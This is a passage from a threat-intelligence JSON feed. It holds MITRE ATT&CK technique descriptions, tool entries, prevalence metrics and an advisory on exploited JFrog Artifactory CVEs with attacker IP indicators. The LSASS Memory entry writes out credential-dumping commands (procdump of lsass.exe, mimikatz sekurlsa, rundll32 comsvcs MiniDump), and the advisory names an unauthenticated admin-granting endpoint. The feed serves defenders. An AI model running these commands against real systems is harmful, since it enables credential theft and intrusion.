is a programming language that conforms to the ECMAScript specification. JavaScript is high-level, often just-in-time compiled and multi-paradigm. It has dynamic typing, prototype-based object-orientation and first-class functions.\r\n\r\nJavaScript is used for web development, in web applications, for game development, and much more. It allows you to implement dynamic features on web pages that cannot be done with only HTML and CSS. Many browsers use JavaScript as a scripting language for doing dynamic things on the web. Any time you see a click-to-show dropdown menu, extra content added to a page, and dynamically changing element colours on a page, to name a few features, you're seeing the effects of JavaScript.\r\n\r\nExploiting JavaScript in cyber attacks is not exactly new, but the increasing frequency of this attack vector is. Even in 2020, JavaScript-based attacks are still a matter of great concern. The danger in these attacks lies in one key aspect: malware delivered via infected JavaScript files doesn\u2019t need user interaction. Better said, a user could get infected with malware without doing anything else than browsing a website. JavaScript is not an insecure programming language, code bugs or improper implementations can create backdoors which attackers can exploit.", "created_on": "2021-11-24T06:14:13.000Z", "name": "JavaScript"}, {"id": "2a2c9204-3e03-11eb-9477-02d538d9640e", "category": "mitre-attack-pattern", "description": "Adversaries may abuse various implementations of JavaScript for execution. JavaScript (JS) is a platform-independent scripting language (compiled just-in-time at runtime) commonly associated with scripts in webpages, though JS can be executed in runtime environments outside the browser.(Citation: NodeJS)\n\nJScript is the Microsoft implementation of the same scripting standard. JScript is interpreted via the Windows Script engine and thus integrated with many components of Windows such as the [Component Object Model](https://attack.mitre.org/techniques/T1559/001) and Internet Explorer HTML Application (HTA) pages.(Citation: JScrip May 2018)(Citation: Microsoft JScript 2007)(Citation: Microsoft Windows Scripts)\n\nJavaScript for Automation (JXA) is a macOS scripting language based on JavaScript, included as part of Apple\u2019s Open Scripting Architecture (OSA), that was introduced in OSX 10.10. Apple\u2019s OSA provides scripting capabilities to control applications, interface with the operating system, and bridge access into the rest of Apple\u2019s internal APIs. As of OSX 10.10, OSA only supports two languages, JXA and [AppleScript](https://attack.mitre.org/techniques/T1059/002). Scripts can be executed via the command line utility <code>osascript</code>, they can be compiled into applications or script files via <code>osacompile</code>, and they can be compiled and executed in memory of other programs by leveraging the OSAKit Framework.(Citation: Apple About Mac Scripting 2016)(Citation: SpecterOps JXA 2020)(Citation: SentinelOne macOS Red Team)(Citation: Red Canary Silver Sparrow Feb2021)(Citation: MDSec macOS JXA and VSCode)\n\nAdversaries may abuse various implementations of JavaScript to execute various behaviors. Common uses include hosting malicious scripts on websites as part of a [Drive-by Compromise](https://attack.mitre.org/techniques/T1189) or downloading and executing these script files as secondary payloads. Since these payloads are text-based, it is also very common for adversaries to obfuscate their content as part of [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027).", "created_on": "2020-12-14T11:54:47.000Z", "name": "JavaScript"}, {"id": "3b8be811-b55d-4414-a1b7-cf7c43cab398", "category": "trellix-tool", "description": "In an Active Directory domain, a lot of interesting information can be retrieved via LDAP by any authenticated user (or machine). This makes LDAP an interesting protocol for gathering information in the recon phase of a pentest of an internal network. A problem is that data from LDAP often is not available in an easy to read format.\r\n\r\nldapdomaindump is a tool which aims to solve this problem, by collecting and parsing information available via LDAP and outputting it in a human readable HTML format, as well as machine readable json and csv/tsv/greppable files.\r\n\r\nSource: https://github.com/dirkjanm/ldapdomaindump", "created_on": "2024-09-06T05:15:06.000Z", "name": "LDAPDomainDump"}, {"id": "0d1f1170-5c5e-11eb-9477-02d538d9640e", "category": "mitre-attack-pattern", "description": "Adversaries may target user email on local systems to collect sensitive information. Files containing email data can be acquired from a user\u2019s local system, such as Outlook storage or cache files.\n\nOutlook stores data locally in offline data files with an extension of .ost. Outlook 2010 and later supports .ost file sizes up to 50GB, while earlier versions of Outlook support up to 20GB.(Citation: Outlook File Sizes) IMAP accounts in Outlook 2013 (and earlier) and POP accounts use Outlook Data Files (.pst) as opposed to .ost, whereas IMAP accounts in Outlook 2016 (and later) use .ost files. Both types of Outlook data files are typically stored in `C:\\Users\\<username>\\Documents\\Outlook Files` or `C:\\Users\\<username>\\AppData\\Local\\Microsoft\\Outlook`.(Citation: Microsoft Outlook Files)", "created_on": "2021-01-22T03:00:58.000Z", "name": "Local Email Collection"}, {"id": "2975ef6f-4134-11eb-9477-02d538d9640e", "category": "mitre-attack-pattern", "description": "Adversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS). After a user logs on, the system generates and stores a variety of credential materials in LSASS process memory. These credential materials can be harvested by an administrative user or SYSTEM and used to conduct [Lateral Movement](https://attack.mitre.org/tactics/TA0008) using [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550).\n\nAs well as in-memory techniques, the LSASS process memory can be dumped from the target host and analyzed on a local system.\n\nFor example, on the target host use procdump:\n\n* <code>procdump -ma lsass.exe lsass_dump</code>\n\nLocally, mimikatz can be run using:\n\n* <code>sekurlsa::Minidump lsassdump.dmp</code>\n* <code>sekurlsa::logonPasswords</code>\n\nBuilt-in Windows tools such as `comsvcs.dll` can also be used:\n\n* <code>rundll32.exe C:\\Windows\\System32\\comsvcs.dll MiniDump PID  lsass.dmp full</code>(Citation: Volexity Exchange Marauder March 2021)(Citation: Symantec Attacks Against Government Sector)\n\nSimilar to [Image File Execution Options Injection](https://attack.mitre.org/techniques/T1546/012), the silent process exit mechanism can be abused to create a memory dump of `lsass.exe` through Windows Error Reporting (`WerFault.exe`).(Citation: Deep Instinct LSASS)\n\nWindows Security Support Provider (SSP) DLLs are loaded into LSASS process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user's Domain password or smart card PINs. The SSP configuration is stored in two Registry keys: <code>HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\Security Packages</code> and <code>HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\OSConfig\\Security Packages</code>. An adversary may modify these Registry keys to add new SSPs, which will be loaded the next time the system boots, or when the AddSecurityPackage Windows API function is called.(Citation: Graeber 2014)\n\nThe following SSPs can be used to access credentials:\n\n* Msv: Interactive logons, batch logons, and service logons are done through the MSV authentication package.\n* Wdigest: The Digest Authentication protocol is designed for use with Hypertext Transfer Protocol (HTTP) and Simple Authentication Security Layer (SASL) exchanges.(Citation: TechNet Blogs Credential Protection)\n* Kerberos: Preferred for mutual client-server domain authentication in Windows 2000 and later.\n* CredSSP:  Provides SSO and Network Level Authentication for Remote Desktop Services.(Citation: TechNet Blogs Credential Protection)\n", "created_on": "2020-12-18T13:23:05.000Z", "name": "LSASS Memory"}, {"id": "05c62473-0837-43a5-82ee-19721efa2788", "category": "trellix-tool", "description": "Lyrebird functions as an anti-censorship tool designed to conceal internet traffic from unauthorized monitoring.", "created_on": "2026-09-10T00:11:56.000Z", "name": "lyrebird"}, {"id": "38e56371-3c26-11eb-9477-02d538d9640e", "category": "mitre-attack-pattern", "description": "Adversaries may chain together multiple proxies to disguise the source of malicious traffic. Typically, a defender will be able to identify the last proxy traffic traversed before it enters their network; the defender may or may not be able to identify any previous proxies before the last-hop proxy. This technique makes identifying the original source of the malicious traffic even more difficult by requiring the defender to trace malicious traffic through several proxies to identify its source.\n\nFor example, adversaries may construct or use onion routing networks \u2013 such as the publicly available [Tor](https://attack.mitre.org/software/S0183) network \u2013 to transport encrypted C2 traffic through a compromised population, allowing communication with any device within the network.(Citation: Onion Routing) Adversaries may also use operational relay box (ORB) networks composed of virtual private servers (VPS), Internet of Things (IoT) devices, smart devices, and end-of-life routers to obfuscate their operations.(Citation: ORB Mandiant) \n\nIn the case of network infrastructure, it is possible for an adversary to leverage multiple compromised devices to create a multi-hop proxy chain (i.e., [Network Devices](https://attack.mitre.org/techniques/T1584/008)). By leveraging [Patch System Image](https://attack.mitre.org/techniques/T1601/001) on routers, adversaries can add custom code to the affected network devices that will implement onion routing between those nodes. This method is dependent upon the [Network Boundary Bridging](https://attack.mitre.org/techniques/T1599) method allowing the adversaries to cross the protected network boundary of the Internet perimeter and into the organization\u2019s Wide-Area Network (WAN).  Protocols such as ICMP may be used as a transport.  \n\nSimilarly, adversaries may abuse peer-to-peer (P2P) and blockchain-oriented infrastructure to implement routing between a decentralized network of peers.(Citation: NGLite Trojan)", "created_on": "2020-12-12T03:00:42.000Z", "name": "Multi-hop Proxy"}, {"id": "a0c78b9d-5ae8-11ea-8942-06365ef617e6", "category": "mitre-attack-pattern", "description": "Adversaries may attempt to get a listing of services running on remote hosts, including those that may be vulnerable to remote software exploitation. Methods to acquire this information include port scans and vulnerability scans using tools that are brought onto a system. \n\nWithin cloud environments, adversaries may attempt to discover services running on other cloud hosts. Additionally, if the cloud environment is connected to a on-premises environment, adversaries may be able to identify services running on non-cloud systems as well.", "created_on": "2020-02-29T11:42:56.000Z", "name": "Network Service Scanning"}, {"id": "d720e36b-640a-4cb4-9d98-45c267ccbc95", "category": "trellix-tool", "description": "Node.js is an open-source, cross-platform JavaScript runtime environment.\r\n\r\nSource: https://nodejs.org/", "created_on": "2024-02-09T22:14:00.000Z", "name": "Node.js"}, {"id": "d739e360-b45d-4278-985e-3c14ece37477", "category": "trellix-tool", "description": "Obfs4proxy operates as a pluggable transport mechanism for the Tor network, modifying user data traffic to prevent internet censors from identifying or blocking the connection.", "created_on": "2026-09-10T00:11:56.000Z", "name": "obfs4proxy"}, {"id": "bf3521a1-28bd-4d1f-80bb-0697d03e7a0f", "category": "trellix-tool", "description": "PivotC2 is an advanced post-exploitation Remote Access Trojan built on Node.js and enhanced with artificial intelligence, specifically engineered to target FortiGate devices. Once an attacker gains access to a network, this tool enables them to execute interactive command-line shells, create tunnels for covert communication, scan internal networks for further targets, and extract sensitive system configurations. By combining these capabilities into a single framework, it allows threat actors to maintain persistence, expand their reach within a compromise, and efficiently gather intelligence from impacted security appliances.", "created_on": "2026-09-10T00:11:56.000Z", "name": "PivotC2"}, {"id": "9cd7844d-2adc-11eb-9477-02d538d9640e", "category": "mitre-attack-pattern", "description": "Adversaries may inject portable executables (PE) into processes in order to evade process-based defenses as well as possibly elevate privileges. PE injection is a method of executing arbitrary code in the address space of a separate live process. \n\nPE injection is commonly performed by copying code (perhaps without a file on disk) into the virtual address space of the target process before invoking it via a new thread. The write can be performed with native Windows API calls such as <code>VirtualAllocEx</code> and <code>WriteProcessMemory</code>, then invoked with <code>CreateRemoteThread</code> or additional code (ex: shellcode). The displacement of the injected code does introduce the additional requirement for functionality to remap memory references. (Citation: Elastic Process Injection July 2017) \n\nRunning code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via PE injection may also evade detection from security products since the execution is masked under a legitimate process. ", "created_on": "2020-11-20T03:00:57.000Z", "name": "Portable Executable Injection"}, {"id": "03a54b3d-aa21-11eb-9477-02d538d9640e", "category": "trellix-tool", "description": "Microsoft's powershell scripting language is available by default from Windows 7 upwards and therefore provides stealth with that environment for launching attacks. Further, powershell has been made open-source and cross-platform with the advent of 'powershell core' in 2016.\r\n\r\nPowerShell provides full access to all Windows services including Microsoft COM (Component Object Model) and Microsoft Windows Management Instrumentation (WMI), while add-ins can easily be imported to include functionality for managing Active Directory, Exchange, etc.\r\n\r\nSome other features that make powershell an interesting choice for attackers include:\r\n - Ability to run code directly in memory with ease\r\n - Flexibility to encode elements of a script in a multitude of ways\r\n - Full access to the Microsoft .Net framework\r\n - Ability to re-create the powershell framework binary using .Net framework dll's.\r\n - Logging and detecting behavior is difficult in older versions\r\n - Availability of a number of quality attack frameworks written in powershell.\r\n\r\nSource: Microsoft", "created_on": "2021-05-01T02:00:33.000Z", "name": "PowerShell"}, {"id": "e95190b8-2b7c-11eb-9477-02d538d9640e", "category": "mitre-attack-pattern", "description": "Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.(Citation: TechNet PowerShell) Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the <code>Start-Process</code> cmdlet which can be used to run an executable and the <code>Invoke-Command</code> cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).\n\nPowerShell may also be used to download and run executables from the Internet, which can be executed from disk or in memory without touching disk.\n\nA number of PowerShell-based offensive testing tools are available, including [Empire](https://attack.mitre.org/software/S0363),  [PowerSploit](https://attack.mitre.org/software/S0194), [PoshC2](https://attack.mitre.org/software/S0378), and PSAttack.(Citation: Github PSAttack)\n\nPowerShell commands/scripts can also be executed without directly invoking the <code>powershell.exe</code> binary through interfaces to PowerShell's underlying <code>System.Management.Automation</code> assembly DLL exposed through the .NET framework and Windows Common Language Interface (CLI).(Citation: Sixdub PowerPick Jan 2016)(Citation: SilentBreak Offensive PS Dec 2015)(Citation: Microsoft PSfromCsharp APR 2014)", "created_on": "2020-11-20T22:08:25.000Z", "name": "PowerShell"}, {"id": "c4271b0f-589e-11ea-8942-06365ef617e6", "category": "mitre-attack-pattern", "description": "Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Administrator or otherwise elevated access may provide better process details. Adversaries may use the information from [Process Discovery](https://attack.mitre.org/techniques/T1057) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.\n\nIn Windows environments, adversaries could obtain details on running processes using the [Tasklist](https://attack.mitre.org/software/S0057) utility via [cmd](https://attack.mitre.org/software/S0106) or <code>Get-Process</code> via [PowerShell](https://attack.mitre.org/techniques/T1059/001). Information about processes can also be extracted from the output of [Native API](https://attack.mitre.org/techniques/T1106) calls such as <code>CreateToolhelp32Snapshot</code>. In Mac and Linux, this is accomplished with the <code>ps</code> command. Adversaries may also opt to enumerate processes via `/proc`. ESXi also supports use of the `ps` command, as well as `esxcli system process list`.(Citation: Sygnia ESXi Ransomware 2025)(Citation: Crowdstrike Hypervisor Jackpotting Pt 2 2021)\n\nOn network devices, [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as `show processes` can be used to display current running processes.(Citation: US-CERT-TA18-106A)(Citation: show_processes_cisco_cmd)", "created_on": "2020-02-26T13:49:10.000Z", "name": "Process Discovery"}, {"id": "c6977579-43a6-11eb-9477-02d538d9640e", "category": "mitre-attack-pattern", "description": "Adversaries may tunnel network communications to and from a victim system within a separate protocol to avoid detection/network filtering and/or enable access to otherwise unreachable systems. Tunneling involves explicitly encapsulating a protocol within another. This behavior may conceal malicious traffic by blending in with existing traffic and/or provide an outer layer of encryption (similar to a VPN). Tunneling could also enable routing of network packets that would otherwise not reach their intended destination, such as SMB, RDP, or other traffic that would be filtered by network appliances or not routed over the Internet. \n\nThere are various means to encapsulate a protocol within another protocol. For example, adversaries may perform SSH tunneling (also known as SSH port forwarding), which involves forwarding arbitrary data over an encrypted SSH tunnel.(Citation: SSH Tunneling)(Citation: Sygnia Abyss Locker 2025) \n\n[Protocol Tunneling](https://attack.mitre.org/techniques/T1572) may also be abused by adversaries during [Dynamic Resolution](https://attack.mitre.org/techniques/T1568). Known as DNS over HTTPS (DoH), queries to resolve C2 infrastructure may be encapsulated within encrypted HTTPS packets.(Citation: BleepingComp Godlua JUL19) \n\nAdversaries may also leverage [Protocol Tunneling](https://attack.mitre.org/techniques/T1572) in conjunction with [Proxy](https://attack.mitre.org/techniques/T1090) and/or [Protocol or Service Impersonation](https://attack.mitre.org/techniques/T1001/003) to further conceal C2 communications and infrastructure. ", "created_on": "2020-12-21T16:08:34.000Z", "name": "Protocol Tunneling"}, {"id": "5501c661-6a87-4d44-8f0f-a049fa674ddf", "category": "country", "description": "Puerto Rico", "created_on": "2023-08-03T05:13:01.000Z", "name": "puerto rico"}, {"id": "2a34d292-3575-11eb-9477-02d538d9640e", "category": "mitre-attack-pattern", "description": "Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user.\n\nRemote desktop is a common feature in operating systems. It allows a user to log into an interactive session with a system desktop graphical user interface on a remote system. Microsoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS).(Citation: TechNet Remote Desktop Services) \n\nAdversaries may connect to a remote system over RDP/RDS to expand access if the service is enabled and allows access to accounts with known credentials. Adversaries will likely use Credential Access techniques to acquire credentials to use with RDP. Adversaries may also use RDP in conjunction with the [Accessibility Features](https://attack.mitre.org/techniques/T1546/008) or [Terminal Services DLL](https://attack.mitre.org/techniques/T1505/005) for Persistence.(Citation: Alperovitch Malware)", "created_on": "2020-12-03T14:38:10.000Z", "name": "Remote Desktop Protocol"}, {"id": "3eb3ad47-3402-47c2-be1f-ca758b5d7b1c", "category": "trellix-tool", "description": "Russh is a library written in the Rust programming language that enables developers to implement secure shell client and server capabilities within their applications. It provides a secure, efficient, and memory-safe framework for establishing remote connections, executing commands, and transferring data over encrypted network protocols. By leveraging the performance and safety guarantees of Rust, it offers a modern alternative for managing network authentication and secure remote communication.", "created_on": "2026-09-10T00:11:56.000Z", "name": "russh"}, {"id": "7e33c695-7803-4b07-89f7-22c5967fb537", "category": "trellix-tool", "description": "The sh utility functions as a command language interpreter, designed to execute commands derived from a command-line string, standard input, or a designated file.", "created_on": "2025-02-27T22:20:16.000Z", "name": "sh (utility)"}, {"id": "78c7ef0f-ae89-11eb-9477-02d538d9640e", "category": "trellix-tool", "description": "This fast, highly configurable IPv4/IPv6 scanner can streamline many of your network support procedures. Its well-designed interface, light weight and portability coupled with an extensive range of options and advanced features make SoftPerfect Network Scanner an invaluable tool, whether you are a professional system administrator, someone providing occasional network maintenance, or a general user interested in computer security.\r\n\r\nSoftPerfect Network Scanner can ping computers, scan ports, discover shared folders and retrieve practically any information about network devices via WMI, SNMP, HTTP, SSH and PowerShell. It also scans for remote services, registry, files and performance counters; offers flexible filtering and display options and exports NetScan results to a variety of formats from XML to JSON.\r\n\r\n(source: [SoftPerfect](https://www.softperfect.com/products/networkscanner/))", "created_on": "2021-05-06T16:38:22.000Z", "name": "SoftPerfect Network Scanner"}, {"id": "9dd09e55-e1bf-11ea-9477-02d538d9640e", "category": "country", "description": "Spain", "created_on": "2020-08-19T01:59:29.000Z", "name": "spain"}, {"id": "0cf64e73-5c5e-11eb-9477-02d538d9640e", "category": "mitre-attack-pattern", "description": "Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into remote machines using Secure Shell (SSH). The adversary may then perform actions as the logged-on user.\n\nSSH is a protocol that allows authorized users to open remote shells on other computers. Many Linux and macOS versions come with SSH installed by default, although typically disabled until the user enables it. On ESXi, SSH can be enabled either directly on the host (e.g., via `vim-cmd hostsvc/enable_ssh`) or via vCenter.(Citation: Sygnia ESXi Ransomware 2025)(Citation: TrendMicro ESXI Ransomware)(Citation: Sygnia Abyss Locker 2025) The SSH server can be configured to use standard password authentication or public-private keypairs in lieu of or in addition to a password. In this authentication scenario, the user\u2019s public key must be in a special file on the computer running the server that lists which keypairs are allowed to login as that user (i.e., [SSH Authorized Keys](https://attack.mitre.org/techniques/T1098/004)).", "created_on": "2021-01-22T03:00:57.000Z", "name": "SSH"}, {"id": "c3f17bf6-589e-11ea-8942-06365ef617e6", "category": "mitre-attack-pattern", "description": "An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use this information to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions. This behavior is distinct from [Local Storage Discovery](https://attack.mitre.org/techniques/T1680) which is an adversary's discovery of local drive, disks and/or volumes.\n\nTools such as [Systeminfo](https://attack.mitre.org/software/S0096) can be used to gather detailed system information. If running with privileged access, a breakdown of system data can be gathered through the <code>systemsetup</code> configuration tool on macOS. Adversaries may leverage a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) on network devices to gather detailed system information (e.g. <code>show version</code>).(Citation: US-CERT-TA18-106A) On ESXi servers, threat actors may gather system information from various esxcli utilities, such as `system hostname get` and `system version get`.(Citation: Crowdstrike Hypervisor Jackpotting Pt 2 2021)(Citation: Varonis)\n\nInfrastructure as a Service (IaaS) cloud providers such as AWS, GCP, and Azure allow access to instance and virtual machine information via APIs. Successful authenticated API calls can return data such as the operating system platform and status of a particular instance or the model view of a virtual machine.(Citation: Amazon Describe Instance)(Citation: Google Instances Resource)(Citation: Microsoft Virutal Machine API)\n\n[System Information Discovery](https://attack.mitre.org/techniques/T1082) combined with information gathered from other forms of discovery and reconnaissance can drive payload development and concealment.(Citation: OSX.FairyTale)(Citation: 20 macOS Common Tools and Techniques) ", "created_on": "2020-02-26T13:49:10.000Z", "name": "System Information Discovery"}, {"id": "c452e2d0-589e-11ea-8942-06365ef617e6", "category": "mitre-attack-pattern", "description": "Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include [Arp](https://attack.mitre.org/software/S0099), [ipconfig](https://attack.mitre.org/software/S0100)/[ifconfig](https://attack.mitre.org/software/S0101), [nbtstat](https://attack.mitre.org/software/S0102), and [route](https://attack.mitre.org/software/S0103).\n\nAdversaries may also leverage a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) on network devices to gather information about configurations and settings, such as IP addresses of configured interfaces and static/dynamic routes (e.g. <code>show ip route</code>, <code>show ip interface</code>).(Citation: US-CERT-TA18-106A)(Citation: Mandiant APT41 Global Intrusion ) On ESXi, adversaries may leverage esxcli to gather network configuration information. For example, the command `esxcli network nic list` will retrieve the MAC address, while `esxcli network ip interface ipv4 get` will retrieve the local IPv4 address.(Citation: Trellix Rnasomhouse 2024)\n\nAdversaries may use the information from [System Network Configuration Discovery](https://attack.mitre.org/techniques/T1016) during automated discovery to shape follow-on behaviors, including determining certain access within the target network and what actions to do next. ", "created_on": "2020-02-26T13:49:11.000Z", "name": "System Network Configuration Discovery"}, {"id": "c455f3c7-589e-11ea-8942-06365ef617e6", "category": "mitre-attack-pattern", "description": "Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network. \n\nAn adversary who gains access to a system that is part of a cloud-based environment may map out Virtual Private Clouds or Virtual Networks in order to determine what systems and services are connected. The actions performed are likely the same types of discovery techniques depending on the operating system, but the resulting information may include details about the networked cloud environment relevant to the adversary's goals. Cloud providers may have different ways in which their virtual networks operate.(Citation: Amazon AWS VPC Guide)(Citation: Microsoft Azure Virtual Network Overview)(Citation: Google VPC Overview) Similarly, adversaries who gain access to network devices may also perform similar discovery activities to gather information about connected systems and services.\n\nUtilities and commands that acquire this information include [netstat](https://attack.mitre.org/software/S0104), \"net use,\" and \"net session\" with [Net](https://attack.mitre.org/software/S0039). In Mac and Linux, [netstat](https://attack.mitre.org/software/S0104) and <code>lsof</code> can be used to list current connections. <code>who -a</code> and <code>w</code> can be used to show which users are currently logged in, similar to \"net session\". Additionally, built-in features native to network devices and [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) may be used (e.g. <code>show ip sockets</code>, <code>show tcp brief</code>).(Citation: US-CERT-TA18-106A) On ESXi servers, the command `esxi network ip connection list` can be used to list active network connections.(Citation: Sygnia ESXi Ransomware 2025)", "created_on": "2020-02-26T13:49:11.000Z", "name": "System Network Connections Discovery"}, {"id": "9669620d-b31f-11eb-9d72-02d538d9640e", "category": "trellix-tool", "description": "Tor is a software suite and network that provides increased anonymity on the Internet. It creates a multi-hop proxy network and utilizes multilayer encryption to protect both the message and routing information. Tor utilizes \"Onion Routing,\" in which messages are encrypted with multiple layers of encryption; at each step in the proxy network, the topmost layer is decrypted and the contents forwarded on to the next node until it reaches its destination.\r\n\r\nSource: MITRE", "created_on": "2021-05-12T12:43:01.000Z", "name": "TOR-The Onion Router"}, {"id": "202b37f8-deeb-4e65-ba3b-d23044f48b95", "category": "country", "description": "United Kingdom", "created_on": "2022-04-25T21:15:53.000Z", "name": "united kingdom"}, {"id": "b83c4260-85b7-11eb-9477-02d538d9640e", "category": "country", "description": "United States of America", "created_on": "2021-03-15T17:56:08.000Z", "name": "united states of america"}, {"id": "d65bdd8b-5bf7-11eb-9477-02d538d9640e", "category": "mitre-attack-pattern", "description": "Adversaries may abuse Unix shell commands and scripts for execution. Unix shells are the primary command prompt on Linux, macOS, and ESXi systems, though many variations of the Unix shell exist (e.g. sh, ash, bash, zsh, etc.) depending on the specific OS or distribution.(Citation: DieNet Bash)(Citation: Apple ZShell) Unix shells can control every aspect of a system, with certain commands requiring elevated privileges.\n\nUnix shells also support scripts that enable sequential execution of commands as well as other typical programming operations such as conditionals and loops. Common uses of shell scripts include long or repetitive tasks, or the need to run the same set of commands on multiple systems.\n\nAdversaries may abuse Unix shells to execute various commands or payloads. Interactive shells may be accessed through command and control channels or during lateral movement such as with [SSH](https://attack.mitre.org/techniques/T1021/004). Adversaries may also leverage shell scripts to deliver and execute multiple commands on victims or as part of payloads used for persistence.\n\nSome systems, such as embedded devices, lightweight Linux distributions, and ESXi servers, may leverage stripped-down Unix shells via Busybox, a small executable that contains a variety of tools, including a simple shell.", "created_on": "2021-01-21T14:49:17.000Z", "name": "Unix Shell"}, {"id": "5cb79b32-971c-4f77-b720-e8c78b604828", "category": "trellix-tool", "description": "Wasabi Hot Cloud Storage is a high-performance object storage service designed as a cost-effective and simplified alternative to traditional hyperscale cloud providers. It utilizes a single-tier architecture known as hot storage, which ensures that all data remains immediately accessible with high read and write speeds without the need for complex management of frequent or infrequent access tiers. The service is fully compatible with the Amazon S3 API, allowing for seamless integration with existing backup, recovery, and data management applications while eliminating common industry expenses such as egress fees and API request charges. By providing a predictable pricing model and robust security features like object immutability to protect against ransomware, Wasabi serves as a scalable solution for organizations requiring reliable data retention and long-term archival capabilities.", "created_on": "2026-01-27T16:17:15.000Z", "name": "Wasabi Hot Cloud Storage"}, {"id": "9ce70935-2adc-11eb-9477-02d538d9640e", "category": "mitre-attack-pattern", "description": "Adversaries may communicate using application layer protocols associated with web traffic to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. \n\nProtocols such as HTTP/S(Citation: CrowdStrike Putter Panda) and WebSocket(Citation: Brazking-Websockets) that carry web traffic may be very common in environments. HTTP/S packets have many fields and headers in which data can be concealed. An adversary may abuse these protocols to communicate with systems under their control within a victim network while also mimicking normal, expected traffic. ", "created_on": "2020-11-20T03:00:57.000Z", "name": "Web Protocols"}], "metrics": [{"date": "2026-09-10", "nodes": 0.23, "events": 0.86, "sectors": [{"sector": "Unknown", "affected": 1.97, "events": 7.22, "total": 1000000}], "countries": [{"iso_code": "IT", "affected": 6.72, "events": 33.6, "total": 1000000}, {"iso_code": "US", "affected": 0.27, "events": 0.27, "total": 1000000}], "countriesTotalDevices": 1000000}, {"date": "2026-09-11", "nodes": 0, "events": 0, "sectors": [], "countries": [], "countriesTotalDevices": 1000000}, {"date": "2026-09-12", "nodes": 0.23, "events": 0.31, "sectors": [{"sector": "Unknown", "affected": 1.97, "events": 2.63, "total": 1000000}], "countries": [{"iso_code": "US", "affected": 0.53, "events": 0.53, "total": 1000000}, {"iso_code": "IT", "affected": 3.36, "events": 6.72, "total": 1000000}], "countriesTotalDevices": 1000000}, {"date": "2026-09-13", "nodes": 0, "events": 0, "sectors": [], "countries": [], "countriesTotalDevices": 1000000}, {"date": "2026-09-14", "nodes": 0.08, "events": 0.08, "sectors": [{"sector": "Various", "affected": 0.66, "events": 0.66, "total": 1000000}], "countries": [{"iso_code": "US", "affected": 0.27, "events": 0.27, "total": 1000000}], "countriesTotalDevices": 1000000}]}, {"id": "b4ba6110-5910-404d-a228-48abbfdeeaba", "threat_level_id": 1, "description": "Wiz Research identified active in-the-wild exploitation of three vulnerabilities affecting JFrog Artifactory: CVE-2026-42016, CVE-2026-42018, and CVE-2026-82329. Attackers chain CVE-2026-42018 (which exposes an internal anonymous-user token) with CVE-2026-42016 (a token scope validation flaw) to escalate from unauthenticated access to administrative privileges. CVE-2026-82329 independently allows unauthenticated attackers to obtain administrative privileges through a single POST request to /access/api/v1/registry/join. Post-exploitation activities observed across compromised instances include creation of persistent administrator accounts, deployment of malicious Groovy plugins for arbitrary code execution, installation of Rust-based backdoors with C2 capabilities, configuration exfiltration, cluster key theft, and SSH key installation. At publication dates, 67-69% of organizations running Artifactory had at least one vulnerable instance. CVE-2026-82329 has seen faster remediation (67% to 49% within two weeks) due to its critical severity rating, while lower-severity CVEs showed slower patching velocity with 59-62% of organizations remaining vulnerable weeks after disclosure.\r\n\r\nThe Trellix Threat Intelligence Group (TIG) gathers and analyzes information from multiple open and closed sources before disseminating intelligence reports. This campaign was researched by Wiz and shared publicly https://www.wiz.io/blog/artifactory-under-attack-in-the-wild-exploitation-of-cve-2026-42016-cve-2026-4201", "kb_article_link": null, "coverage": null, "external_analysis": {"links": ["https://www.wiz.io/blog/artifactory-under-attack-in-the-wild-exploitation-of-cve-2026-42016-cve-2026-4201"]}, "is_coat": 0, "name": "Multiple Critical JFrog Artifactory Flaws Under Attack", "prevalence": {"countries": [{"iso_code": "TR", "affected": 259.26, "events": 422.49, "total": 1000000}, {"iso_code": "US", "affected": 2.41, "events": 9.36, "total": 1000000}, {"iso_code": "IT", "affected": 6.72, "events": 13.44, "total": 1000000}, {"iso_code": "MY", "affected": 30.88, "events": 30.88, "total": 1000000}, {"iso_code": "AT", "affected": 10.94, "events": 10.94, "total": 1000000}, {"iso_code": "IN", "affected": 3.33, "events": 3.33, "total": 1000000}], "events": 10.31, "nodes": 5.47, "sectors": [{"sector": "Various", "affected": 45.96, "events": 86.67, "total": 1000000}], "countriesTotalDevices": 1000000}, "iocs": [{"type": "ip", "value": "93.104.155.133"}, {"type": "ip_port", "value": "3.88.162.79:36789"}, {"type": "ip_port", "value": "64.207.232.6:8443"}, {"type": "ip", "value": "149.102.229.150"}, {"type": "ip", "value": "186.247.79.240"}, {"type": "ip", "value": "182.62.201.69"}, {"type": "ip", "value": "146.19.216.120"}, {"type": "ip", "value": "185.190.58.172"}, {"type": "ip", "value": "45.61.176.88"}, {"type": "ip", "value": 